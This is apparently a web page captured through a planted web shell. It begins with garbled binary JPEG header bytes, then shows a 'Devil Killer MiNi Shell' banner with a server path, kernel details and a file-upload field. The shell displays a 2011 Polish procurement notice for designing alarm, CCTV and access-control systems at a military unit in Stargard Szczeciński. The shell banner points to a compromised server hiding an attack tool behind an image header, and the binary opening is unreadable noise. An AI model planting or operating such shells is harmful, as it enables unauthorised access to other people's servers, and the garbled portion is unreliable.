JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111006/323360-N-2011.html

<p class="kh_header"><b>Szczecin: Usługa polegająca na wykonaniu dokumentacji projektowej wraz ze specyfikacjami technicznymi wykonania i odbioru robót budowlanych  i częścią kosztową, dostarczenie decyzji o pozwoleniu na budowę oraz pełnieniu nadzoru autorskiego przyszłych robót realizowanych wg sporządzonej dokumentacji projektowej na realizację zadania Integracja systemów alarmowych w kompleksie w Jednostce Wojskowej zlokalizowanej ul. Aleja Żołnierza 37 w miejscowości Stargard Szczeciński.</b><br>
<b>Numer ogłoszenia: 323360 - 2011; data zamieszczenia: 06.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury , ul. Narutowicza 17B, 70-240 Szczecin, woj. zachodniopomorskie, tel. 091 8892000, 8892026, faks 091 8892024, 8892029, 4331054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.rzi.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa polegająca na wykonaniu dokumentacji projektowej wraz ze specyfikacjami technicznymi wykonania i odbioru robót budowlanych  i częścią kosztową, dostarczenie decyzji o pozwoleniu na budowę oraz pełnieniu nadzoru autorskiego przyszłych robót realizowanych wg sporządzonej dokumentacji projektowej na realizację zadania Integracja systemów alarmowych w kompleksie w Jednostce Wojskowej zlokalizowanej ul. Aleja Żołnierza 37 w miejscowości Stargard Szczeciński..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na wykonaniu dokumentacji projektowej wraz ze specyfikacjami technicznymi wykonania i odbioru robót budowlanych  i częścią kosztową, dostarczenie decyzji o pozwoleniu na budowę oraz pełnieniu nadzoru autorskiego przyszłych robót realizowanych wg sporządzonej dokumentacji projektowej na realizację zadania Integracja systemów alarmowych w kompleksie w Jednostce Wojskowej zlokalizowanej ul. Aleja Żołnierza 37 w miejscowości Stargard Szczeciński.

2. Przedmiot zamówienia ma uwzględniać n/w zakres rzeczowy:

- organizację centrum dozoru na wartowni w budynku nr 1 wraz z zabezpieczeniem pomieszczenia centrum dozoru,
- tablicę synoptycznej w Centrum Nadzoru, na dyżurce Oficera Dyżurnego i u Komendanta Ochrony z możliwością zastąpienia odpowiednim programem komputerowym ze zobrazowaniem monitoringu na monitorze LCD,
- modernizację i rozbudowę  systemu SWiN, CCTV, SAP w 
a)	pododdziałowych magazynach broni w budynku nr 2, 3, 4, 6, 8, 9
b)	filii kancelarii tajnej i pomieszczeniach GWŁ w budynku nr 2
- system Kontroli Dostępu i Video-domofonowego w budynku nr 2 dla pomieszczeń Garnizonowego Węzła Łączności i filii kancelarii tajnej,
- przekaz sygnału alarmowego z centrum ppoż. do centrum dozoru,
- infrastrukturę do położenia magistrali dla systemów alarmowych w kanałach o przekroju 110 mm łączących wszystkie elementy systemu zabezpieczeń technicznych,
- system Kontroli Dostępu na biurze przepustek i przy wjeździe na teren kompleksu, systemu zabezpieczeń mechanicznych i Video-domofonowego przed furtką wejściową,
- przekaz sygnałów alarmowych  z kompleksu 1860 GSA, biblioteki i klubu garnizonowego oraz PST 1 do Centrum Dozoru,
- system KD w budynku nr 1 do wymagań standardu JW ( aktualnie funkcjonujący w budynku nr 1 system KD przebudować w oparciu o urządzenia zastosowane w innych budynkach tej JW, zapewnić możliwość transportowania baz danych pomiędzy systemami KD w całej JW. oraz wykonać wszelkie niezbędne okablowanie)

3.  Szczegółowy opis prac i zakres prac związanych z wykonaniem zadania znajduje się w Programie inwestycji o klauzuli ZASTRZEŻONE (nr Z-804), który znajduje się w posiadaniu Zamawiającego (Ośrodek Dokumentacji Budownictwa Wojskowego) i zostanie udostępniony do wglądu w siedzibie RZI Szczecin na pisemny wniosek Wykonawcy w sposób określony przez Zamawiającego (informacji udzieli kierownik kancelarii RZI tel. 91 451-20-66).

4. Przedmiot zamówienia należy wykonać między innymi w oparciu o:

- dane i wymagania zawarte w programie inwestycji wraz z opiniami stanowiącymi jego integralną część; 
- oraz dane wynikające z wizji lokalnej obiektu.

5. W zakres nieniejszego zamówienia wchodzi wykonanie:

1)	mapy sytuacyjno-wysokościowej do celów projektowych na obszarze dotyczącym opracowania - 1 egz.;

2)	inwentaryzacji budowlanej w zakresie budynków i pomieszczeń objętych projektem - 4 egz.
Inwentaryzację należy uzgodnić 15 Wojskowego Oddziału Gospodarczego ( 15 WOG) w Szczecinie Uzgodnienie będzie miało formę pisemną z klauzulą Stwierdzam zgodność inwentaryzacji ze stan faktycznym.

3)	projektu budowlanego wraz z projektem zagospodarowania terenu, który ma być zgodny z Rozporządzeniem Ministra Infrastruktury z dnia 23.07.2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. 2003 nr 120, poz. 1133) oraz wymaganiami Ustawy Prawo Budowlane z dnia 07.07.1994 r. (Dz. U. 2006 nr 156, poz. 1118 - z późniejszymi zmianami) - 6 egz. /egzemplarze do uzgodnień zapewnia Projektant.

Wykonawca uzgodni pisemnie projekt  budowlany z:

1)	Dowódca Wojsk Lądowych
2)	Dowódca 12 Dywizji Zmechanizowanej
3)	użytkownikiem - Dowódcą  JW. 1749 Szczecin,
4)	administratorem - Komendantem 15 Wojskowego Oddziału Gospodarczego ( 15 WOG) w Szczecinie,
5)	RWŁ Szczecin,
6)	rzeczoznawcą ds. przeciwpożarowych;
7)	rzeczoznawcą ds. bhp;
8)	Szefem Rejonowego Zarządu Infrastruktury Szczecin.

Wykonawca uzyska również inne uzgodnienia i opinie nie wymienione wyżej, a wymagane przepisami szczególnymi, w tym te wynikające z decyzji administracyjnych np. decyzji o lokalizacji inwestycji celu publicznego.

Wykonawca Dokumentacji Projektowej przekaże Zamawiającemu prawomocną decyzję pozwolenia na budowę.
	
Egzemplarze do uzgodnień dostarcza Wykonawca.

4)	projektu wykonawczego, który ma być zgodny z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2005 nr 75, poz. 664) - 6 egz. egzemplarze do uzgodnień zapewnia Projektant

5)	przedmiarów robót, które mają być zgodne z § 6 Rozporządzenia Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2005 nr 75, poz. 664). - 6 egz.

UWAGA:
- w przedmiarze robót do pozycji w przedmiaru robót ma być odniesienie odnośnie numeru punktu do specyfikacji technicznej wykonania i odbioru robót.

6)	informacji o problematyce bezpieczeństwa i ochrony zdrowia (BIOZ) w trakcie wykonywania robót budowlanych, która ma być zgodne z Rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003 r. w sprawie informacji dotyczących bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia  (Dz. U. 2003 nr 120, poz. 1126 - z późniejszymi zmianami) - 6 egz.

7)	specyfikacji technicznych wykonania i odbioru robót budowlanych, które mają być zgodne z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2005 nr 75, poz. 664 - z późniejszymi zmianami) - 6 egz.

8)	kosztorysów inwestorskich, które mają być zgodne z Rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. nr 130, poz. 1389 - z późniejszymi zmianami) - 2 egz.

UWAGA:
- W kosztorysie należy wykazać rodzaje robót z podaniem kodu CPV (np. demontażowe, budowlane, sanitarne, elektryczne, itp.)
- Każdy rodzaj robót powinien zostać podzielony na elementy z podaniem jednostek miar, ilości jednostek oraz ich wartość

9)	zestawienie kosztów zadania (ZKZ), które ma być zgodne z § 30 Decyzji MON nr 7/MON z dnia 14.01.2008r. (wraz ze zmianami wprowadzonymi decyzją MON nr 104/MON z dnia 01.04.2011 r.) w sprawie zasad opracowywania i realizacji centralnych planów rzeczowych wg załączonego wzoru. - 1 egz.

10)	uzyskanie i przekazanie Zamawiającemu  decyzji o pozwoleniu na budowę na podstawie wykonanego projektu uzyskanych w imieniu inwestora (Zamawiającego) wymaganymi przepisami szczególnymi, pozwoleń, uzgodnień lub opinii innych organów.

11)	udzielanie odpowiedzi na pytania dotyczące dokumentacji projektowej zgłaszane przez Wykonawców w trakcie prowadzonego postępowania o udzielenie zamówienia publicznego na roboty budowlane wykonywane na podstawie opracowanej dokumentacji ( Art.20 ust. 1 pkt. 3 Prawo budowlane)

12)	sprawowanie  nadzoru autorskiego na podstawie art. 20 ust.1 pkt. 4 ustawy  Prawo budowlane z dnia 7.07.1994 r ( Dz. U. 1994 Nr 89, poz. 414).

Zamawiający zleca w ramach niniejszej umowy i ceny ryczałtowej, bez prawa do dodatkowego wynagrodzenia, pełnienie nadzoru autorskiego podczas wykonywania robót na podstawie opracowanej przez siebie dokumentacji projektowej. Pełnienie nadzoru autorskiego obejmuje wykonanie podstawowych obowiązków projektanta w zakresie nadzoru autorskiego, wynikające z art. 20 ust. 1 pkt 4 Ustawy z dnia 7 lipca 1994r. Prawo Budowlane oraz wykonywanie innych czynności wskazanych przez Zamawiającego, a w szczególności:
- stwierdzania w toku wykonywania robót budowlanych zgodności realizacji z projektem
- uzgadniania możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłaszanych przez kierownika budowy lub inspektora nadzoru autorskiego

Nadzór autorski obejmuje:
- odpowiednie przygotowanie się Wykonawcy do pełnienia nadzoru autorskiego, wraz z przygotowaniem ewentualnych potrzebnych materiałów,
- dojazd na miejsce pełnienia nadzoru autorskiego oraz powrót do siedziby Wykonawcy,
- pobyt na budowie przez okres niezbędny dla wykonania wszystkich czynności związanych z pełnieniem nadzoru autorskiego,
- wykonie nadzoru autorskiego przez dostarczenie dla Zamawiającego koniecznych dokumentów lub dokonanie odpowiednich wpisów i potwierdzeń we właściwych dokumentach, które są niezbędne z punktu widzenia celu, któremu maja służyć,
- za nadzór autorski uznaje się również czynności wykonywane przez Wykonawcę w siedzibie Zamawiającego.

UWAGA:
- Nie uznaje się za nadzór autorski czynności związanych z usuwaniem oczywistych wad opracowanej przez siebie dokumentacji projektowej, jak również braku rozwiązań w dokumentacji projektowej wynikających z programu inwestycji, które można było przewidzieć na etapie projektowania, a niezbędnych do prawidłowego użytkowania obiektu.
- Wykonawca ponosi odpowiedzialność wobec Zamawiającego za wszelkie nieprawidłowości  przy realizacji robót budowlanych a powstałe w wyniku wad dokumentacji projektowej.
- Wykonawca pełnić będzie nadzór autorski na każde pisemne wezwanie Zamawiającego, według potrzeb wynikających z postępu robót.
- Pisemne wezwanie Wykonawcy przez Zamawiającego zawierać będzie zakres nadzoru autorskiego i będzie następować w terminie nie krótszym niż 7 dni przed datą pełnienia nadzoru autorskiego.
- Nadzór autorski sprawowany będzie do dnia odbioru końcowego robót budowlanych wykonywanych na podstawie wykonanej przez wykonawcę dokumentacji.
- Każdorazowe dopełnienie czynności związanych z pełnieniem nadzoru autorskiego następować będzie niezwłocznie, jednak nie dłużej niż do 7 dni oraz musi być poparte protokołem odbioru wykonanej czynności, który będzie zawierał termin jej realizacji, szczegółowy zakres nadzoru wraz z wymienieniem przeprowadzonych czynności oraz uzyskanych efektów. 
- Protokół odbioru wykonanej usługi potwierdza podpisem właściwy (branżowo) Inspektor Nadzoru Inwestorskiego.
13) Wykonawca dostarczy dla Zamawiającego przedmiotowe opracowania (wymienione w pkt. 5 ppkt. od 5 do 9) w formie elektronicznej w formacie PDF na płycie CD pogrupowane w katalogi, w taki sposób, że 1 folder odpowiada zawartości 1 opracowania (1 teczki). Ponadto Wykonawca dostarczy dla Zamawiającego wersje elektroniczne w formatach: - ATH dla kosztorysów inwestorskich i przedmiarów robót; - DOC dla części opisowych specyfikacji technicznej wykonania i odbioru robót budowlanych, informacji o problematyce bezpieczeństwa i ochrony zdrowia (BIOZ), zestawienia kosztów zadania (tabele dodatkowo w programie Excel).

UWAGA: w/w formaty dotyczą tylko opracowań jawnych.

6. Weryfikacja i odbiór dokumentacji projektowej będzie się odbywał na zasadach określonych w § 30 z Decyzji MON nr 7/MON z dnia 14.01.2008r. (wraz ze zmianami wprowadzonymi decyzją MON nr 104/MON z dnia 01.04.2011 r.) w spr. zasad opracowywania i realizacji centralnych planów rzeczowych. Po otrzymaniu pełnej dokumentacji projektowo-kosztorysowej inwestor zwołuje posiedzenie Komisji Oceny Projektów Inwestycyjnych i Remontowych, z udziałem przedstawicieli, o których mowa w § 28 ust. 14 i 16 oraz przedstawicieli wyspecjalizowanych służb lub instytucji, w celu dokonania oceny przedmiotowej dokumentacji. Z posiedzenia Komisji sporządza się protokół, który podlega zatwierdzeniu przez inwestora. W przypadku negatywnej oceny, o której mowa w ust. 5, dokonanej przez Komisję, po otrzymaniu informacji o usunięciu stwierdzonych uchybień zwołuje się ponownie posiedzenie Komisji, w celu dokonania powtórnej oceny dokumentacji. Zatwierdzony protokół, w którym dokonano pozytywnej oceny dokumentacji jest podstawą do akceptacji przez inwestora projektu budowlanego i zestawienia kosztów zadania.

7.  Wykonawca do dokumentacji projektowej załączy pisemne oświadczenie, zgodnie z wzorem - zał. nr. 8 do SIWZ.

8. Wykonawca, po otrzymaniu informacji o wyborze jego oferty, w terminie 3 dni dostarczy dla Zamawiającego do kancelarii RZI Szczecin ze wskazaniem adresata i nr sprawy - Szef Wydziału Budownictwa w jednym egzemplarzu kopię uprawnień projektowych osób wymienionych w wykazie  osób uczestniczących w realizacji zamówienia  oraz kopię uprawnień geodezyjnych - potwierdzoną za zgodność z oryginałem.

9. Wykonawca, po otrzymaniu informacji o wyborze jego oferty, w terminie 3 dni dostarczy dla Zamawiającego do kancelarii RZI Szczecin ze wskazaniem adresata i nr sprawy - kierownik POIN w jednym egzemplarzu kopię potwierdzoną za zgodność z oryginałem wymienionych poniżej dokumentów:
a)	Świadectwa Bezpieczeństwa Przemysłowego I stopnia (okazanie oryginału podczas podpisywania umowy)
b)	Poświadczeń bezpieczeństwa dla niżej wymienionych osób:
- Kierownika firmy
- Pracowników wymienionych w części VII SIWZ pkt. 3)
c) Zaświadczeń stwierdzających odbycie szkolenia z zasad informacji niejawnych kierownika firmy i wszystkich osób wymienionych w części VII SIWZ pkt. 3)
d) Świadectwa ukończenia kursów w zakresie projektowania systemów alarmowych klasy SA-4 oraz licencji pracowników zabezpieczenia technicznego II stopnia osób wymienionych w części VII SIWZ pkt. 3) ppkt. d)
e)  Dokumentu potwierdzającego zatrudnienie pełnomocnika ochrony
f)   Dokumentu określającego przewoźnika obsługującego firmę w zakresie poczty niejawnej.

10.  Zadanie wiąże się z dostępem do informacji niejawnych na poziomie POUFNE

Klauzule tajności dokumentów:

- Sekcja mapy sytuacyjno - wysokościowej w skali 1:500 - POUFNE
- Projekt budowlany wraz z planem zagospodarowania terenu - POUFNE
- Projekt wykonawczy - POUFNE
- Projekt systemu  SWiN i KD (oddzielne opracowanie) - POUFNE
- Projekt SAP (oddzielne opracowanie) - ZASTRZEŻONE
- Pozostałe opracowania nie muszą posiadać klauzuli tajności

11.  Wykonawca zobowiązuje się do odbycia wizji lokalnej przed złożeniem oferty i zapoznaniem z zakresem przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 180.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości  2 000,00 PLN
Zamawiający nie wymaga wniesienia Zabezpieczenia Należytego Wykonania Umowy (ZNWU)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności  w zakresie pozwalającym na realizację zadania tj. posiadają Świadectwo Bezpieczeństwa Przemysłowego I stopnia o którym mowa w art. 55 ust. 1 pkt. 1 i 2 ustawy z dn. 05.08.2010 r. o ochronie informacji niejawnych (Dz. U. z 2010 r., nr 182, poz. 1228).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie pozwalające na realizację zamówienia, tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert o udzielenie w/w zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie nabyli wiedzę i doświadczenie wykonując  usługi polegające na wykonaniu dokumentacji projektowej oraz dostarczeniu decyzji o pozwoleniu na budowę o łącznej wartości minimum:   200 000,00 zł brutto, w tym jedną usługę polegającą na projektowaniu systemów ochrony o wartości minimum 50 000 zł brutto wraz z załączeniem dokumentów potwierdzających, że usługi zostały wykonane należycie (Rozporządzenie Prezesa Rady Ministrów z dnia 30.12.2009 r. Dz. U. nr 226 poz.1817-  §1, ust.1, pkt  3).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia tj. osobami które będą uczestniczyć w wykonywaniu zamówienia - odpowiedzialnymi za świadczenie usług, posiadającymi  ważne poświadczenia bezpieczeństwa do poziomu co najmniej POUFNE oraz zaświadczenia stwierdzające odbycie szkolenia w zakresie ochrony informacji niejawnych dla:

 -  pełnomocnika ds.  ochrony informacji niejawnych
 -  osób posiadających uprawnienia:
       a)  projektowe  w specjalności architektonicznej - 1 osoba
                         b) projektowe  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elekrtycznych i elektroenergetycznych - 1 osoba
       c)  projektowe w specjalności konstrukcyjno- budowlanej - 1 osoba
       d)  w zakresie projektowania systemów alarmowych klasy SA-4 - min. 2 osoby
       e)  geodezyjne - 1 osoba</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ich  sytuacja ekonomiczna i finansowa zapewnia wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
